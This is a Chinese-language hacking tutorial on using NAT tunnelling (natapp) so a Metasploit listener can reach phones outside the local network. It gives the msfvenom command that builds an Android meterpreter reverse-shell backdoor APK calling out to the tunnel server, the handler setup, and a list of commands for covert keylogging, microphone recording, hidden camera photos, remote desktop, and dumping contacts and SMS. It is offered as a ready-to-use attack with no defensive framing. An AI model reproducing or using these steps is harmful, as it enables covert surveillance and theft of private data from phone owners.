經常使用metsploit的同學可能會有疑問,為啥我只能在同一局域網里面滲透主機呢?......
這主要是因為你的身處於內網之中。不知道大家對內網和外網的理解是什么?這里我給大家普及一下吧!
什么是內網?內網接入方式:上網的計算機得到的IP地址是Inetnet上的保留地址,保留地址有如下3種形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x內網的計算機以NAT(網絡地址轉換)協議,通過一個公共的網關訪問Internet。內網的計算機可Internet上的其他計算機發送連接請求,但Internet上其他的計算機無法向內網的計算機發送連接請求。
什么是外網(也稱為公網)?使用ADSL的用戶,如果只有一個用戶一台計算機在使用此寬帶,沒有使用路由功能,而是用撥號軟件直接撥號上網的,這種情況下,該用戶目前所處的網絡為外網,外網的用戶都擁有一個屬於自己的獨立IP地址.公網的計算機和Internet上的其他計算機可隨意互相訪問。
如何判斷你是網絡是內網還是外網呢?輸入WIN+R進去MS-DOS命令行里面,輸入:ipconfig看一下自己的ip:如果你的IP地址屬於保留地址(保留地址開頭為:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的計算機就是運行在局域網內。
使用natapp服務/內網穿透工具Ngrok 。
這里以natapp進行實驗
你在natapp官網注冊好后獲得一條免費隧道,添加tcp通道,端口號自定,例如2018,ip填127.0.0.1
在linux下首先下載natapp的客戶端,然后再命令行內啟動natapp 語句: ./natapp -authtoken=************ 后面的星號換成自己的口令
(如果提示權限不夠 chmod a+x natapp )
啟動成功后可以看到下面圖片
ping 一下第一個圈內的服務器 得到ip地址120.3.51.1 后面位端口號 34611
開始生成外網小馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk
一定要注意ip和端口填服務器的
將apk文件安裝到安卓手機上。
啟動 msfconsole
依次輸入下面的命令
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 2018
監聽127.0.0.1:2018 (內網穿透相當於先將數據發給服務器,然后由服務器發給內網中的我們 )
啟動run
用你的電話卡流量試試看打開app
keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄
record_mic:錄制聲音(如果目標主機上有話筒的話)
webcam_chat:查看攝像頭接口
webcam_stream //開啟攝像頭
webcam_list:查看攝像頭列表
webcam_snap //隱秘拍照功能
webcam_snap 隱秘拍照功能 -i 1 或者2是開啟前置攝像頭和后置攝像頭的
run vnc:開啟遠程桌面
dump_contacts //導出電話號碼
dump_sms //導出信息
可以輸入?查看更多命令